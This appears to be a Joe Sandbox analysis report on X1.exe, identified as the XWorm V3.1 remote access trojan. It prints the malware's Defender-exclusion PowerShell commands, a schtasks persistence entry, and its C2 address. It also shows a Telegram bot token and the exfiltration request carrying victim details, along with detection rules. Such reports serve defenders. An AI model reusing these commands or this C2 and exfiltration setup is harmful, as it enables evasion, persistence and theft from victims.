Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
X1.exe

Overview

General Information

Sample name:X1.exe
Analysis ID:1430689
MD5:2ab2f26ab78dbd53cea3b71c00d568c2
SHA1:53f0a2fdde2f1fe6e1ad44b87b8325624cdeb3fa
SHA256:1f204b43acfdf5d1088f37b2159d98d5500bdaeec99cd3f0d6e8ceb77282351b
Tags:exe
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Telegram RAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • X1.exe (PID: 3664 cmdline: "C:\Users\user\Desktop\X1.exe" MD5: 2AB2F26AB78DBD53CEA3B71C00D568C2)
    • powershell.exe (PID: 4320 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X1.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4304 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'X1.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6412 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\X1.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 5004 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "X1" /tr "C:\Users\user\AppData\Roaming\X1.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 4296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • X1.exe (PID: 6112 cmdline: "C:\Users\user\AppData\Roaming\X1.exe" MD5: 2AB2F26AB78DBD53CEA3B71C00D568C2)
  • X1.exe (PID: 940 cmdline: "C:\Users\user\AppData\Roaming\X1.exe" MD5: 2AB2F26AB78DBD53CEA3B71C00D568C2)
  • X1.exe (PID: 5860 cmdline: C:\Users\user\AppData\Roaming\X1.exe MD5: 2AB2F26AB78DBD53CEA3B71C00D568C2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["91.92.252.220"], "Port": "4442", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "explorer.exe", "Telegram URL": "https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672", "Version": "XWorm V3.1"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
X1.exeJoeSecurity_XWormYara detected XWormJoe Security
    X1.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      X1.exeJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        X1.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x96b8:$s6: VirtualBox
        • 0x9616:$s8: Win32_ComputerSystem
        • 0xa35a:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0xa3f7:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0xa50c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x9b96:$cnc4: POST / HTTP/1.1

        Dropped Files

        SourceRuleDescriptionAuthorStrings
        C:\Users\user\AppData\Roaming\X1.exeJoeSecurity_XWormYara detected XWormJoe Security
          C:\Users\user\AppData\Roaming\X1.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
            C:\Users\user\AppData\Roaming\X1.exeJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
              C:\Users\user\AppData\Roaming\X1.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0x96b8:$s6: VirtualBox
              • 0x9616:$s8: Win32_ComputerSystem
              • 0xa35a:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0xa3f7:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0xa50c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0x9b96:$cnc4: POST / HTTP/1.1

              Memory Dumps

              SourceRuleDescriptionAuthorStrings
              00000000.00000002.3286328027.0000000002E51000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                00000000.00000002.3286328027.0000000002E51000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  00000000.00000000.2025401364.0000000000C52000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                    00000000.00000000.2025401364.0000000000C52000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                      00000000.00000000.2025401364.0000000000C52000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                      • 0x94b8:$s6: VirtualBox
                      • 0x9416:$s8: Win32_ComputerSystem
                      • 0xa15a:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      • 0xa1f7:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                      • 0xa30c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                      • 0x9996:$cnc4: POST / HTTP/1.1
                      Click to see the 3 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      0.0.X1.exe.c50000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                        0.0.X1.exe.c50000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                          0.0.X1.exe.c50000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                            0.0.X1.exe.c50000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                            • 0x96b8:$s6: VirtualBox
                            • 0x9616:$s8: Win32_ComputerSystem
                            • 0xa35a:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                            • 0xa3f7:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                            • 0xa50c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                            • 0x9b96:$cnc4: POST / HTTP/1.1

                            Sigma Signatures

                            System Summary

                            barindex
                            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X1.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X1.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\X1.exe", ParentImage: C:\Users\user\Desktop\X1.exe, ParentProcessId: 3664, ParentProcessName: X1.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X1.exe', ProcessId: 4320, ProcessName: powershell.exe
                            Sigma detected: Change PowerShell Policies to an Insecure Level
                            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X1.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X1.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\X1.exe", ParentImage: C:\Users\user\Desktop\X1.exe, ParentProcessId: 3664, ParentProcessName: X1.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X1.exe', ProcessId: 4320, ProcessName: powershell.exe
                            Sigma detected: Powershell Defender Exclusion
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X1.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X1.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\X1.exe", ParentImage: C:\Users\user\Desktop\X1.exe, ParentProcessId: 3664, ParentProcessName: X1.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X1.exe', ProcessId: 4320, ProcessName: powershell.exe
                            Sigma detected: Startup Folder File Write
                            Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\X1.exe, ProcessId: 3664, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\X1.lnk
                            Sigma detected: Suspicious Schtasks From Env Var Folder
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "X1" /tr "C:\Users\user\AppData\Roaming\X1.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "X1" /tr "C:\Users\user\AppData\Roaming\X1.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\X1.exe", ParentImage: C:\Users\user\Desktop\X1.exe, ParentProcessId: 3664, ParentProcessName: X1.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "X1" /tr "C:\Users\user\AppData\Roaming\X1.exe", ProcessId: 5004, ProcessName: schtasks.exe
                            Sigma detected: Non Interactive PowerShell Process Spawned
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X1.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X1.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\X1.exe", ParentImage: C:\Users\user\Desktop\X1.exe, ParentProcessId: 3664, ParentProcessName: X1.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X1.exe', ProcessId: 4320, ProcessName: powershell.exe

                            Snort Signatures

                            Timestamp:04/24/24-02:56:33.471440
                            SID:2852874
                            Source Port:4442
                            Destination Port:49714
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:04/24/24-02:56:33.471440
                            SID:2852870
                            Source Port:4442
                            Destination Port:49714
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:04/24/24-02:55:52.480977
                            SID:2855924
                            Source Port:49714
                            Destination Port:4442
                            Protocol:TCP
                            Classtype:A Network Trojan was detected

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus / Scanner detection for submitted sample
                            Source: X1.exeAvira: detected
                            Antivirus detection for URL or domain
                            Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
                            Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
                            Antivirus detection for dropped file
                            Source: C:\Users\user\AppData\Roaming\X1.exeAvira: detection malicious, Label: TR/Spy.Gen
                            Found malware configuration
                            Source: X1.exeMalware Configuration Extractor: Xworm {"C2 url": ["91.92.252.220"], "Port": "4442", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "explorer.exe", "Telegram URL": "https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672", "Version": "XWorm V3.1"}
                            Multi AV Scanner detection for domain / URL
                            Source: 91.92.252.220Virustotal: Detection: 11%Perma Link
                            Multi AV Scanner detection for dropped file
                            Source: C:\Users\user\AppData\Roaming\X1.exeReversingLabs: Detection: 78%
                            Source: C:\Users\user\AppData\Roaming\X1.exeVirustotal: Detection: 71%Perma Link
                            Multi AV Scanner detection for submitted file
                            Source: X1.exeReversingLabs: Detection: 78%
                            Source: X1.exeVirustotal: Detection: 71%Perma Link
                            Machine Learning detection for dropped file
                            Source: C:\Users\user\AppData\Roaming\X1.exeJoe Sandbox ML: detected
                            Machine Learning detection for sample
                            Source: X1.exeJoe Sandbox ML: detected
                            Sample uses string decryption to hide its real strings
                            Source: X1.exeString decryptor: 91.92.252.220
                            Source: X1.exeString decryptor: 4442
                            Source: X1.exeString decryptor: <123456789>
                            Source: X1.exeString decryptor: <Xwormmm>
                            Source: X1.exeString decryptor: explorer.exe
                            Source: X1.exeString decryptor: bc1q7p5qe345uqww9e4ut3nt08tu2lsgnvfsc40azt
                            Source: X1.exeString decryptor: 0x797460dC66e416bead591be98635aaafB836b8e7
                            Source: X1.exeString decryptor: TKojtDLFNx6pFPXDuM3QV6FivRUeQzyRWA
                            Source: X1.exeString decryptor: 2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo
                            Source: X1.exeString decryptor: 966649672
                            Source: X1.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49710 version: TLS 1.2
                            Source: X1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                            Networking

                            barindex
                            Snort IDS alert for network traffic
                            Source: TrafficSnort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 91.92.252.220:4442 -> 192.168.2.5:49714
                            Source: TrafficSnort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 91.92.252.220:4442 -> 192.168.2.5:49714
                            Source: TrafficSnort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.5:49714 -> 91.92.252.220:4442
                            C2 URLs / IPs found in malware configuration
                            Source: Malware configuration extractorURLs: 91.92.252.220
                            Uses the Telegram API (likely for C&C communication)
                            Source: unknownDNS query: name: api.telegram.org
                            Yara detected Generic Downloader
                            Source: Yara matchFile source: X1.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.X1.exe.c50000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\X1.exe, type: DROPPED
                            Source: global trafficTCP traffic: 192.168.2.5:49714 -> 91.92.252.220:4442
                            Source: global trafficHTTP traffic detected: GET /bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672&text=%E2%98%A0%20%5BXWorm%20V3.1%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AB98DB222DCA51DFE7851%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                            Source: Joe Sandbox ViewASN Name: THEZONEBG THEZONEBG
                            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                            Source: unknownDNS query: name: ip-api.com
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.220
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.220
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.220
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.220
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.220
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.220
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.220
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.220
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.220
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.220
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.220
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.220
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.220
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.220
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.220
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.220
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.220
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.220
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: global trafficHTTP traffic detected: GET /bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672&text=%E2%98%A0%20%5BXWorm%20V3.1%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AB98DB222DCA51DFE7851%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: unknownDNS traffic detected: queries for: ip-api.com
                            Source: X1.exe, X1.exe.0.drString found in binary or memory: http://ip-api.com/line/?fields=hosting
                            Source: powershell.exe, 00000002.00000002.2130681568.0000016F58B90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2240905862.0000020690070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2411697517.00000247336A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                            Source: powershell.exe, 00000008.00000002.2294748616.0000024723883000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                            Source: powershell.exe, 00000002.00000002.2113461388.0000016F48D49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2164373516.0000020680229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2294748616.0000024723883000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                            Source: X1.exe, 00000000.00000002.3286328027.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2113461388.0000016F48B21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2164373516.0000020680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2294748616.0000024723631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: powershell.exe, 00000002.00000002.2113461388.0000016F48D49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2164373516.0000020680229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2294748616.0000024723883000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                            Source: powershell.exe, 00000008.00000002.2294748616.0000024723883000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                            Source: powershell.exe, 00000002.00000002.2113461388.0000016F48B21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2164373516.0000020680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2294748616.0000024723631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                            Source: X1.exe, X1.exe.0.drString found in binary or memory: https://api.telegram.org/bot
                            Source: powershell.exe, 00000008.00000002.2411697517.00000247336A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                            Source: powershell.exe, 00000008.00000002.2411697517.00000247336A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                            Source: powershell.exe, 00000008.00000002.2411697517.00000247336A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                            Source: powershell.exe, 00000008.00000002.2294748616.0000024723883000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                            Source: powershell.exe, 00000002.00000002.2130681568.0000016F58B90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2240905862.0000020690070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2411697517.00000247336A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49710 version: TLS 1.2

                            Key, Mouse, Clipboard, Microphone and Screen Capturing

                            barindex
                            Contains functionality to log keystrokes (.Net Source)
                            Source: X1.exe, XLogger.cs.Net Code: KeyboardLayout
                            Source: X1.exe.0.dr, XLogger.cs.Net Code: KeyboardLayout
                            Source: C:\Users\user\Desktop\X1.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                            Operating System Destruction

                            barindex
                            Protects its processes via BreakOnTermination flag
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: 01 00 00 00 Jump to behavior

                            System Summary

                            barindex
                            Malicious sample detected (through community Yara rule)
                            Source: X1.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 0.0.X1.exe.c50000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 00000000.00000000.2025401364.0000000000C52000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: C:\Users\user\AppData\Roaming\X1.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: C:\Users\user\Desktop\X1.exeCode function: 0_2_00007FF848F1FECD0_2_00007FF848F1FECD
                            Source: C:\Users\user\Desktop\X1.exeCode function: 0_2_00007FF848F112E90_2_00007FF848F112E9
                            Source: C:\Users\user\Desktop\X1.exeCode function: 0_2_00007FF848F191290_2_00007FF848F19129
                            Source: C:\Users\user\Desktop\X1.exeCode function: 0_2_00007FF848F121D10_2_00007FF848F121D1
                            Source: C:\Users\user\Desktop\X1.exeCode function: 0_2_00007FF848F16CB20_2_00007FF848F16CB2
                            Source: C:\Users\user\Desktop\X1.exeCode function: 0_2_00007FF848F15F060_2_00007FF848F15F06
                            Source: C:\Users\user\Desktop\X1.exeCode function: 0_2_00007FF848F15A090_2_00007FF848F15A09
                            Source: C:\Users\user\Desktop\X1.exeCode function: 0_2_00007FF848F1953A0_2_00007FF848F1953A
                            Source: C:\Users\user\Desktop\X1.exeCode function: 0_2_00007FF848F1A1BB0_2_00007FF848F1A1BB
                            Source: C:\Users\user\AppData\Roaming\X1.exeCode function: 13_2_00007FF848F412E913_2_00007FF848F412E9
                            Source: C:\Users\user\AppData\Roaming\X1.exeCode function: 14_2_00007FF848F0158714_2_00007FF848F01587
                            Source: C:\Users\user\AppData\Roaming\X1.exeCode function: 15_2_00007FF848F312E915_2_00007FF848F312E9
                            Source: X1.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: X1.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 0.0.X1.exe.c50000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
